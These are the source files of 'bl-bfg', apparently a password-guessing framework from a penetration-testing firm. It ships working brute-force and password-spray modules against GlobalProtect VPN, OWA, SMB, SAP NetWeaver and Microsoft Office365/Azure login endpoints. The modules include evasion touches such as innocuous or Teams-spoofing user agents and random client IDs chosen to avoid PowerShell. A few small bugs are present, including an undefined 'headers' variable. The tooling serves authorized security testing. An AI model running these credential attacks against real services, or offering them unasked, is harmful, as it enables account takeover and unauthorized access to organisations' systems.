from bfg.module import Module as BLModule
from bfg.args.testing import default

class Module(BLModule):
    '''Fake authentication callback for testing purposes. Accepts a
    username and password value during initialization that will be
    compared against future authentication calls.

    This effectively gives developers a mechanism by which to emulate
    an authentication event during tool development.
    '''

    description = brief_description = 'Fake authentication module for ' \
            'training/testing'
    args = default()
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __init__(self, username:str, password:str):
        '''Initialize the Fake object.

        - username - username value
        - password - password value
        '''

        self.username = username
        self.password = password

    def __call__(self, username, password):
        'Check the provided username and password values'
   
        if username == self.username and password == self.password:
            return dict(outcome=1, username=username, password=password)
        else:
            return dict(outcome=0, username=username, password=password)



from bfg.args import argument

@argument
def username(name_or_flags=('--username',),
        required=True,
        help='Username value to test against.'):
    pass

@argument
def password(name_or_flags=('--password',),
        required=True,
        help='Password value to test against.'):
    pass

def default():

    return [username(), password()]



#!/usr/bin/env python3

import warnings
warnings.filterwarnings('ignore')
from re import search,match,compile
import requests
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA


'''
# SAMPLE REQUEST

--------------------------------------------------------------------------------
POST /global-protect/login.esp HTTP/1.1
Host: x.x.x.x.
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://64.3.140.242/global-protect/login.esp
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Connection: close
Upgrade-Insecure-Requests: 1



prot=https%3A&server=x.x.x.x&inputStr=&action=getsoftware&user=secretusername&passwd=secretpassword&ok=Log+In
--------------------------------------------------------------------------------

## Notes

- Requests UA must be changed to something innocuous
- Requires 'Content-Type: application/x-www-form-urlencoded'
- Requires real cookies from get request of same resource

# SAMPLE RESPONSE

--------------------------------------------------------------------------------
HTTP/1.1 512 Custom error
Date: Fri, 05 Apr 2019 17:25:47 GMT
Content-Type: text/html
Content-Length: 8450
Connection: close
ETag: "6f7fa-47a8-5c6247db"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
x-private-pan-globalprotect: auth-failed
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-FRAME-OPTIONS: DENY
Set-Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; path=/; secure; HttpOnly
--------------------------------------------------------------------------------

## Notes

- Custom status code
- Custom header: x-private-pan-globalprotect
'''

url_re = compile(
    '^(?P<prot>https?:)//(?P<server>.+?)(?P<port>:[1-9]{1}[0-9]{,4})?/'
)

class Module(HTTPModule):
    '''
    Palo Alto Global Protect login example

    url parameter should be the full path to the post resource, such as:
        https://sub.domain.com/global-protect/login.esp. I've left this
    flexible to compensate for any changes in the URL scheme due to unique
    configurations.
    '''

    description = brief_description = 'Global Protect web interface'

    args = http_args.getDefaults()

    contributors = [
        dict(
            name='Justin Angel [Creator]',
            additional=dict(
                company='Black Hills Information Security',
                twitter='@ImposterKeanu'))
        ]

    @handleUA
    def __call__(self, username, password, *args, **kwargs):

        m = match(url_re, self.url)

        assert m, 'Invalid URL provided'
        assert m['prot'], 'No protocol extracted from url; use full URL with scheme'
        assert m['server'], 'No server extracted; check url'

        # Extract POST information
        groups = m.groupdict()
        self.prot = groups['prot']
        self.server = groups['server']

        # Global Protect requires a specific Content-Type header
        if not 'Content-Type' in headers:
            headers['Content-Type'] = 'application/x-www-form-urlencoded'

        sess = requests.Session()

        # CRAFT THE POST DATA
        data = {'prot':self.prot, 'server':self.server,
            'inputStr':'', 'action':'getsoftware',
            'user':username, 'passwd':password,
            'ok':'Log In'}

        # get some cookies
        sess.get(self.url, 
            headers=self.headers,
            verify=self.verify_ssl,
            proxies=self.proxies)
    
        # make the request
        resp = sess.post(self.url,
            data=data,
            headers=self.headers,
            verify=self.verify_ssl,
            allow_redirects=False,
            proxies=self.proxies)
    
        # verify credentials and return outcome
        if resp.status_code == 512:
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)



#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
from re import search
import requests
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA

class Module(HTTPModule):

    description = brief_description = 'OWA 2016 web interface'
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    @handleUA
    def __call__(self,username,password,*args,**kwargs):

        # post data
        data = {
            'destination':self.url,
            'flags':4,
            'forcedownlevel':0,
            'username':username,
            'password':password,
            'passwordText':'',
            'isUtf8':1
        }
    
        # make the request
        resp = requests.post(self.url,
                data=data,
                headers=self.headers,
                verify=self.verify_ssl,
                allow_redirects=False,
                proxies=self.proxies)
    
        # verify credentials and return outcome
        if resp.status_code == 302 and resp.headers['Location'] and (
            search(r'auth\/logon\.aspx\?', resp.headers['Location'])):
            return [0, username, password]
        else:
            return [1, username, password]




# NOTE: This module relies on the pysmb package
from smb.SMBConnection import SMBConnection
import re
import string
from random import randint,choice
from bfg.module import Module as BLModule
from bfg.args import argument

def gen_client_name(min_len=5,max_len=15):
    '''Generate a random client name.
    '''
    
    i = randint(min_len,max_len)

    return ''.join(
                [choice(string.ascii_letters+string.digits) for n in range(32)]
            )

@argument
def server_ip(name_or_flags=('--server-ip',),
        required=True,
        help='IP address of the SMB server to target. '
            'Required: %(required)s'):
    pass

@argument
def server_name(name_or_flags=('--server-name',),
        help='Server hostname. Default: %(default)s',
        default=None):
    pass

@argument
def server_port(name_or_flags=('--server-port',),
        help='Server port. Default: %(default)s',
        default=445):
    pass

@argument
def client_name(name_or_flags=('--client-name',),
        help='Client name. Default: %(default)s',
        default=None):
    pass

@argument
def default_domain(name_or_flags=('--default-domain',),
        default='WORKGROUP',
        help='Default workgroup name when domain is not provided'
            'with a username. Default: %(default)s'):
    pass

class Module(BLModule):
    '''Defining the callback
    '''

    brief_description = description = 'Target a single SMB server.'

    args = [server_ip(), server_name(), server_port(), client_name(),
            default_domain()]

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __init__(self, server_ip, server_name, server_port,
            client_name, default_domain):
        '''Initialize the SMB Callback.
        '''

        self.server_ip = server_ip
        self.server_port = server_port
        self.default_domain = default_domain

        self.server_name = server_name if server_name else server_ip
        self.client_name = client_name if client_name else \
                gen_client_name()

    def __call__(self, username, password, *args, **kwargs):
    
        # ==================
        # PARSE THE USERNAME
        # ==================
    
        # Assume domains are passed with each username in one of three formats:
            # DOMAIN/USERNAME
            # DOMAIN\USERNAME
            # USERNAME@DOMAIN

        original_username = username
    
        if re.search(r'@',username):
            username, domain = username.split('@')
        elif re.search(r'/',username) or re.search(r'\\|\\',username):
            domain, username = re.split(r'/|\\',username)
        else:
            domain = self.default_domain

        conn = SMBConnection(username, password, self.client_name,
                self.server_name, domain=domain, use_ntlm_v2=True,
                is_direct_tcp=True)
        outcome = conn.connect(self.server_ip, self.server_port)

        # =============
        # RETURN OUTPUT
        # =============

        if outcome:
            conn.close()
            return dict(outcome=1, username=username, password=password)
        else:
            return dict(outcome=0, username=username, password=password)



#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
from re import search
import requests
from bfg.args import http as http_args, argument
from bfg.shortcuts.http import HTTPModule, handleUA

@argument
def flags(name_or_flags=('--flags',),
        help='Flags POST parameter value.',
        default=0):
    pass

@argument
def forcedownlevel(name_or_flags=('--forcedownlevel',),
        type=int, default=0,
        help='Flags POST parameter value.'):
    pass

@argument
def trusted(name_or_flags=('--trusted',),
        type=int, default=0,
        help='trust POST parameter value'):
    pass

@argument
def isUTF8(name_or_flags=('--isUtf8',),
        type=int, default=1,
        help='isUTF8 POST parameter value.'):
    pass
        
class Module(HTTPModule):

    description = brief_description = 'OWA 2010 web interface'

    args = [http_args.url(), flags(), forcedownlevel(), trusted(),
            isUTF8()] + \
        http_args.getDefaults('url', invert=True)

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __post_init__(self, flags, forcedownlevel, trusted, isUtf8,
            *args, **kwargs):

        self.flags = flags
        self.forcedownlevel = forcedownlevel
        self.trusted = trusted
        self.isUtf8 = isUtf8

    @handleUA
    def __call__(self,username,password,*args,**kwargs):
    
        # post data
        data = {
            'destination':self.url,
            'flags':self.flags,
            'forcedownlevel':self.forcedownlevel,
            'trusted':self.trusted,
            'username':username,
            'password':password,
            'isUtf8':self.isUtf8
        }
    
        # make the request
        resp = requests.post(self.url,
                data=data,
                headers=self.headers,
                verify=self.verify_ssl,
                allow_redirects=False,
                proxies=self.proxies)
    
        # verify credentials and return outcome
        if resp.status_code == 302 and resp.headers['Location'] and (
            search(r'auth\/logon\.aspx\?', resp.headers['Location'])):
            return dict(outcome=0, username=username, password=password)
        else:
            return dict(outcome=1, username=username, password=password)



import re
from random import randint
from bfg.data import loadAzureSSOSoap
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA
from bfg.modules.http.ms_graph import module as graph
from bfg.modules.http.azure_ad_seamless_sso import module as sso

def msol_url():
    '''Return an argparse argument for the MSOL URL.
    '''

    return http_args.url(
        name_or_flags=('--url',),
        required=False,
        default=graph.MSONLINE_URL,
        help='Microsoft Online URL to target. Default: %(default)s')

def azure_sso_url():
    '''Return an argparse argument for the Azure SSO URL.
    '''

    return http_args.url(
        name_or_flags=('--azure-sso-url',),
        required=False,
        default=sso.AZURE_SSO_URL,
        help='Azure SSO URL to target. Default: %(default)s')

class Module(HTTPModule):

    brief_description = 'Blended attack against Azure'

    description = (
        'Brute force various Azure endpoints:\n'
        ' - Graph'
        ' - Seamless SSO')

    args = [msol_url(), azure_sso_url()] + \
        http_args.getDefaults('url', invert=True)

    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    references = []

    def __post_init__(self, azure_sso_url, *args, **kwargs):

        self.msol_url = self.url
        self.azure_sso_url = azure_sso_url

    @handleUA 
    def __call__(self, username, password, *args, **kwargs):
        '''Proxy the call request up to the Session object to perform
        authentication.
        '''

        # Is this AI?
        if randint(0,1):
            Session = graph.Session
            url = self.msol_url
        else:
            Session = sso.Session
            url = self.azure_sso_url

        session = Session(url=url,
                headers=self.headers,
                verify_ssl=self.verify_ssl,
                allow_redirects=self.allow_redirects)

        if self.proxies:
            session.proxies.update(self.proxies)

        outcome, valid_account, events = session.authenticate(username,
                password)

        events = events if events else []

        return dict(outcome=outcome,
                username=username,
                password=password,
                actionable=valid_account,
                events=events)








from logging import getLogger, INFO
from bfg.args import argument, getArgDefaults

getLogger('urllib3.connectionpool').setLevel(INFO)

DEFAULT_USER_AGENT = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 ' \
        'Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko' \
        ') Chrome/85.0.4183.121 Mobile Safari/537.36'

@getArgDefaults
def getDefaults():
    return DEFAULTS

@argument
def url(name_or_flags=('--url',),
        required=True,
        help='The URL to target. Required: %(required)s'):
    pass

@argument
def proxies(name_or_flags=('--proxies',),
        required=False,
        nargs='+',
        help='Space delimited proxies to use. Each value should '
            'be in URL format, prefixed with the target HTTP protocol. '
            'If you\'re using an HTTPS application through Burp, '
            'for instance, then you would need to prefix the target '
            'application URL with "https:", e.g. '
            'https:http://localhost:8080. If the proxy is Socks5, then '
            'it becomes https:socks5://localhost:1080. Required: '
            '%(required)s'):
    pass

@argument
def headers(name_or_flags=('--headers',),
        nargs='+',
        required=False,
        help='Space delimited static HTTP headers to pass along to '
            'each request. Note that each header must be formatted '
            'as follows: "Header: value". Required: %(required)s'):
    pass

@argument
def verify_ssl(name_or_flags=('--verify-ssl',),
        action='BoolAction',
        default=False,
        help='Determines if SSL certificate verification occurs. '
            'Default: %(default)s'):
    pass

@argument
def user_agent(name_or_flags=('--user-agent',),
        default=DEFAULT_USER_AGENT,
        help='User-Agent string value. Default: %(default)s'):
    pass

@argument
def allow_redirects(name_or_flags=('--allow-redirects',),
        action='BoolAction',
        default=False,
        help='Determines if redirects should be followed. '
            'Default: %(default)s'):
    pass

URL = url()
PROXIES = proxies()
HEADERS = headers()
VERIFY_SSL = verify_ssl()
USER_AGENT = user_agent()
ALLOW_REDIRECTS = allow_redirects()

DEFAULTS = {
    'url':URL,
    'proxies':PROXIES,
    'headers':HEADERS,
    'verify_ssl':VERIFY_SSL,
    'user_agent':USER_AGENT,
    'allow_redirects':ALLOW_REDIRECTS,
}






#!/usr/bin/env python3
import warnings
warnings.filterwarnings('ignore')
import re
import requests
import logging
from bfg.args import http as http_args
from bfg.shortcuts.http import HTTPModule, handleUA

UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (' \
    'KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'

BASE_PATH = '/webdynpro/dispatcher/sap.com/tc~wd~tools'

def url():

    return http_args.url(help='Base URL, e.g. '
        'https://sap.samedomain.com. Standard paths will be suffixed.')

class Module(HTTPModule):

    description = brief_description = 'SAP Netweaver Webdynpro, ver. ' \
        '7.3007.20120613105137.0000'
    args = [url()] + http_args.getDefaults('url', invert=True)
    contributors = [
            dict(
                name='Justin Angel [Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu'))
        ]

    def __post_init__(self, *args, **kwargs):

        self.url += BASE_PATH

    @handleUA
    def __call__(self,username,password,*args,**kwargs):


        # Construct a session
        session = requests.Session(headers=self.headers)

        # ========================
        # GET COOKIES & CSRF TOKEN
        # ========================

        # Get cookies
        resp = session.get(self.url+'/WebDynproConsole',
                verify=self.verify_ssl,
                proxies=self.proxies)

        # Find the j_salt value from the response body
        match = re.search('name="j_salt" value="(.*?)"', resp.text)

        if not match:
            raise Exception('Failed to extract j_salt CSRF token')

        # =====================
        # GUESS THE CREDENTIALS
        # =====================
    
        # make the request
        resp = session.post(self.url+'/j_security_check',
                data={
                        'j_salt':match.groups()[0],
                        'j_username':username,
                        'j_password':password
                    },
                verify=self.verify_ssl,
                allow_redirects=False,
                proxies=self.proxies)

        events = []

        if re.search('Logon with password not allowed', resp.text):
            events.append(f'Logon with password not allowed: {username}')
    
        output = dict(outcome=0,
            username=username,
            password=password,
            events=events)

        # verify credentials and return outcome
        if not re.search('authentication failed', resp.text, re.I):
            output['outcome'] = 1

        return output



import argparse
import inspect
import re

def bindSignatureArgs(func, src:dict) -> dict:
    '''

    Args:
        func: Function/method from which the signature will be sourced.
        src: Source dictionary that will provide values for dest.

    Returns:
        A new dictionary with argument values from src set
        in dest.

    '''

    dest = {}

    # Iterate over paramaters and values in the function's
    # signature
    for k,v in inspect.signature(func).parameters.items():

        # Skip "self" references
        if k == 'self': continue

        # Extract the user supplied value when provided
        if k in src: dest[k]=src[k]

        # Use the default value other wise
        else: dest[k]=v

    return dest
        
class Module:

    '''# Base Module Class

    This class serves as a template for brute force modules. It builds
    the interface subcommands by inspecting the __init__ method while
    also enforcing restrictions on the __call__ method to ensure
    BruteLoops can make authentication callbacks.

    # The __init__ Method

    This method can be used to set static values supporting a brute
    force module. It's useful in situations when an upstream server
    needs to be targeted.

    # The __call__ Method

    This method is called for each authentication attempt by BruteLoops
    and should check the validity of a username and password. The method
    signature must look like:

    ```
    def __call__(self, username, password, *args, **kwargs):
        success = False

        # Do authentication and update success to True if successful

        if success: return dict(outcome=1,username=username,password=password)
        else: return dict(outcome=0,username=username,password=password,
    ```

    Note the structure returned in the declaration above. The leading
    integer value determines if authentication was successful, indicating
    valid credentials: 1 means success, 0 means failure.
    '''

    # Name for the module that'll be shown in logging
    name = None

    # Brief description to display in the help menu
    brief_description = None

    # Description of the module that'll be shown in the interface
    description = None

    @classmethod
    def initialize(cls, args):
        '''Initialize and return the underlying brute force module.
        '''

        print('Initializing module!')

        # Translate the argparse arguments to a dictionary
        args = vars(args)

        # Initialize a dictionary to hold all of the necessary argument
        # to initialize the brute force module.
        dct = bindSignatureArgs(func=cls.__init__, src=args)

        # Initialize and return the module
        instance = cls(**dct)

        if hasattr(instance, '__post_init__'):

            instance.__post_init__(
                **bindSignatureArgs(
                    func=instance.__post_init__,
                    src=args))

        return instance

    @classmethod
    def validate(cls):

        # ==============================
        # VALIDATING THE __call__ METHOD
        # ==============================

        # Ensure that it's declared
        assert getattr(cls,'__call__'),('Modules must be callable. '
             'Declare a __call__ method on the module: ' \
             f'{cls.get_handle}')

        # Get a list of parameter names
        call_params = list(inspect.signature(cls.__call__).parameters \
                .keys())

        if call_params and call_params[0] == 'self':
            call_params = call_params[1:3]

        # Ensure there are two or greater params to be received
        assert len(call_params) == 2,('__call__ must receive at ' \
              'least two arguments: username, password')

        # Ensure that the first two are 'username' and 'password'
        assert ['username','password'] == call_params,('__call__ ' \
            'must receive the first two arguments as username, ' \
            f'password -- not: {call_params}')

    @classmethod
    def get_handle(cls):
        '''Return a simple string to use as a module identifier.
        '''

        return '.'.join(cls.__module__.split('.')[-3:][:2])

    @classmethod
    def build_interface(cls,
            subparsers: 'Argparse subparsers that will receive the subcommand') \
                    -> argparse.ArgumentParser:
        '''Use the inspect module to iterate over each parameter
        declared in __init__ and build an interface via argparse.
        '''

        epilog = None
        if hasattr(cls, 'contributors'):

            # ==========================
            # FORMAT MODULE CONTRIBUTORS
            # ==========================

            epilog = 'Contributors:\n\n'

            if not isinstance(cls.contributors, list):

                raise ValueError(
                    'Module contributors must be a list of dictionary '
                    f'values, not {type(cls.contributors)}')

            for cont in cls.contributors:

                if not isinstance(cont, dict):

                    raise ValueError(
                        'contributor records must be dictionaries, '
                        f'not {type(cont)}')

                name = cont.get('name')
                additional = cont.get('additional')

                if not name:

                    raise ValueError(
                        'contributor records must have a "name" field')

                epilog += f'\n- {name}'

                if additional:

                    if not isinstance(additional, dict):

                        raise ValueError(
                            'additional field of contributor records '
                            f'must be a dict, not {type(additional)}')

                    for k,v in additional.items():

                        epilog += f'\n  {k}: {v}'


                epilog += '\n'

        if hasattr(cls, 'references'):

            # ========================
            # FORMAT MODULE REFERENCES
            # ========================

            epilog += f'\nReferences:\n'

            references = cls.references

            if not isinstance(references, list):

                raise ValueError(
                    f'References must be a list, got {type(references)}')

            for ref in references:
                epilog += f'\n- {ref}'

        # ======================
        # BUILD MODULE ARGUMENTS
        # ======================

        '''Here we create a new argparse argument parser for the command
        assoicated with the newly created module. This is how we bind
        the name that the user will refernce at the commandline, along
        with providing a mechanism to assign values to module parameters.
        '''

        parser = subparsers.add_parser(cls.get_handle(),
                description=cls.description,
                help=cls.brief_description,
                parents=cls.args,
                formatter_class=argparse.RawDescriptionHelpFormatter,
                epilog=epilog)

        parser.set_defaults(module=cls)

        parser.add_argument('--database', '-db',
            required=True,
            help='Database to target.')

        return parser




# ========================
# CREDENTIAL STATUS VALUES
# ========================

CRED_VALID   =  1
CRED_INVALID =  0
CRED_FAILED  = -1

# ======================
# USERNAME STATUS VALUES
# ======================
# It's just easier to read when returning multiple values

USERNAME_VALID   = True
USERNAME_INVALID = False



import re
import inspect
from bfg.data import loadAzureSSOSoap
from bfg.args import http as http_args, argument
from requests import Session
from bfg.shortcuts.http import HTTPModule, handleUA
from bfg.shortcuts.azure import *
from requests.exceptions import ConnectionError

MSONLINE_URL    = 'https://login.microsoftonline.com'
MSONLINE_NETLOC = 'login.microsoftonline.com'
O365_URL        = 'https://outlook.office365.com'
AUTH_PATH       = '/common/oauth2/token'

#DEFAULT_RESOURCE_URL  = 'https://graph.windows.net'
#DEFAULT_CLIENT_ID     = '1b730954-1685-4b74-9bfd-dac224a7b894'
DEFAULT_RESOURCE_URL = 'https://graph.microsoft.com'
DEFAULT_CLIENT_ID    = '1fec8e78-bce4-4aaf-ab1b-5451cc387264'
DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit' \
        '/537.36 (KHTML, like Gecko) Teams/1.2.00.34161 Chrome/66.0' \
        '.3359.181 Electron/3.1.13 Safari/537.36'

def strip_slash(s):

    if s and s[-1] == '/':
        s=s[:len(s)-1]

    return s

class Session(Session):

    def __init__(self, url, headers=None, allow_redirects=True,
            verify_ssl=False, *args, **kwargs):

        super().__init__(*args, **kwargs)

        # Configure redirects
        self.allow_redirects=allow_redirects

        # using the setattr builtin here because requests.Session
        # doesn't care for new instance variables beinga assigned
        setattr(self,'verify_ssl',verify_ssl)

        # Update MSOL URL
        self.url = strip_slash(url)

        # Update headers
        headers = headers if headers else {}
        headers['Accept']='application/json'
        self.headers.update(headers)

    def authenticate(self, username, password, client_id,
            resource_url):
        '''Authenticate the credentials via the Graph API.
        '''

        credential = f'{username}:{password}'

        # ==================================
        # PREPARE THE CLIENT/RESOURCE VALUES
        # ==================================

        if resource_url == 'RANDOM':
            name, resource_url = getRandomResource()

        if client_id == 'RANDOM':
            while True:
                client_id = getRandomListItem(
                    MSOL_UNIVERSAL_CLIENT_IDS)
                if client_id != '1b730954-1685-4b74-9bfd-dac224a7b894':
                    # Loop until the client_id is not PowerShell
                    break

        # ================
        # MAKE THE REQUEST
        # ================

        # Create the POST data
        data = {'resource':resource_url,
            'client_id':client_id,
            'client_info':'1',
            'grant_type':'password',
            'username':username,
            'password':password,
            'scope':'openid'}

        # Make the post request
        resp = self.post(self.url+AUTH_PATH,
                data=data,
                allow_redirects=self.allow_redirects,
                verify=self.verify_ssl)

        # ===================
        # HANDLE THE RESPONSE
        # ===================

        # Search the response for error codes
        error_code = re.search(ERROR_CODE_RE, resp.text)
        if error_code:

            error_code = error_code.groups()[0]
            outcome, username_valid, events = \
                lookupCode(resp.status_code, error_code)

            if events:
                events[0] += f' - {credential}'

            return outcome, username_valid, events

        else:

            if resp.status_code == 200:
                return 1, True, ['200 OK response']
            else:
                return -1, True, ['Unhandled response event occurred']

def url():

    return http_args.url(
        name_or_flags=('--url',),
        required=False,
        default=MSONLINE_URL,
        help='Microsoft Online URL to target. Default: %(default)s')

@argument
def clientID(name_or_flags=('--client-id',),
        default=DEFAULT_CLIENT_ID,
        help='Client ID (UUID) to use. EXPERIMENTAL: Supply RANDOM to '
            'select a random value. Default: %(default)s'):
    pass

@argument
def resourceURL(name_or_flags=('--resource-url',),
        default=DEFAULT_RESOURCE_URL,
        help='Resource URL to use. EXPERIMENTAL: Supply RANDOM to '
            'select a random value. Default: %(default)s'):
    pass

def user_agent():

    return http_args.url(
        name_or_flags=('--user-agent',),
        required=False,
        default=DEFAULT_UA,
        help='User-Agent header value. Defaults to Teams: %(default)s')

class Module(HTTPModule):

    brief_description = 'Office365 Graph API'

    description = 'Brute force the Office365 Graph API.'

    args = [url(), user_agent()] + \
            http_args.getDefaults(
                'url', 'user_agent',
                invert=True) + \
            [clientID(), resourceURL(),]

    contributors = [
            dict(
                name='Michael Allen [Researcher]',
                additional=dict(
                    company='Black Hills Information Security')),
            dict(
                name='Justin Angel [Module Creator]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@ImposterKeanu')),
            dict(
                name='Steve Borosh [Lead Researcher]',
                additional=dict(
                    company='Black Hills Information Security',
                    twitter='@rvrsh3ll')),
            dict(
                name='Corey Ham [Researcher]',
                additional=dict(
                    company='Black Hills Information Security')),
        ]

    references = [
            'Gerenios - Client IDs - https://github.com/Gerenios/' \
                'AADInternals/blob/master/AccessToken_utils.ps1#L11',
            'rvrsh3ll - Obscure error handling - https://github.com/' \
                'rvrsh3ll/aad-sso-enum-brute-spray',
        ]

    def __post_init__(self, client_id, resource_url,
            *args, **kwargs):

        self.client_id = client_id
        self.resource_url = resource_url

    @handleUA 
    def __call__(self, username, password, *args, **kwargs):
        '''Proxy the call request up to the Session object to perform
        authentication.
        '''

        session = Session(url=self.url,
                headers=self.headers,
                verify_ssl=self.verify_ssl,
                allow_redirects=self.allow_redirects)

        if self.proxies:
            session.proxies.update(self.proxies)

        try:

            outcome, valid_account, events = \
                session.authenticate(
                    username = username,
                    password = password,
                    client_id = self.client_id,
                    resource_url = self.resource_url)

        except ConnectionError:

            return dict(
                outcome=-1,
                username=username,
                password=password,
                events=['Connection timed out'])

        events = events if events else []

        return dict(outcome=outcome,
                username=username,
                password=password,
                actionable=valid_account,
                events=events)







import setuptools

# Read README.md as a variable to pass as the package's long
# description
with open('README.md', 'r', encoding='utf-8') as f:
    long_description = f.read()

setuptools.setup(
    name='bl-bfg',
    version='0.5.4.1',
    author='Justin Angel',
    author_email='justin@arch4ngel.ninja',
    description='A simple password guessing framework.',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/arch4ngel/bl-bfg',
    include_package_data=True,
    package_dir={'':'src'},
    packages=setuptools.find_packages(where='src'),
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: MIT License',
        'Operating System :: POSIX :: Linux',
    ],
    python_requires='>=3.7',
    scripts=['bfg'],
    package_data={'bfg.datasets':['*.txt', '*.yaml', '*.xml']},
    install_requires=[
        'bruteloops >= 0.2',
        'requests_ntlm == 1.1.0',
        'pysmb == 1.1.27',
        'lxml >= 4.6.4',
        'pyyaml',
        'xmltodict',
        'dict-toolbox']
)
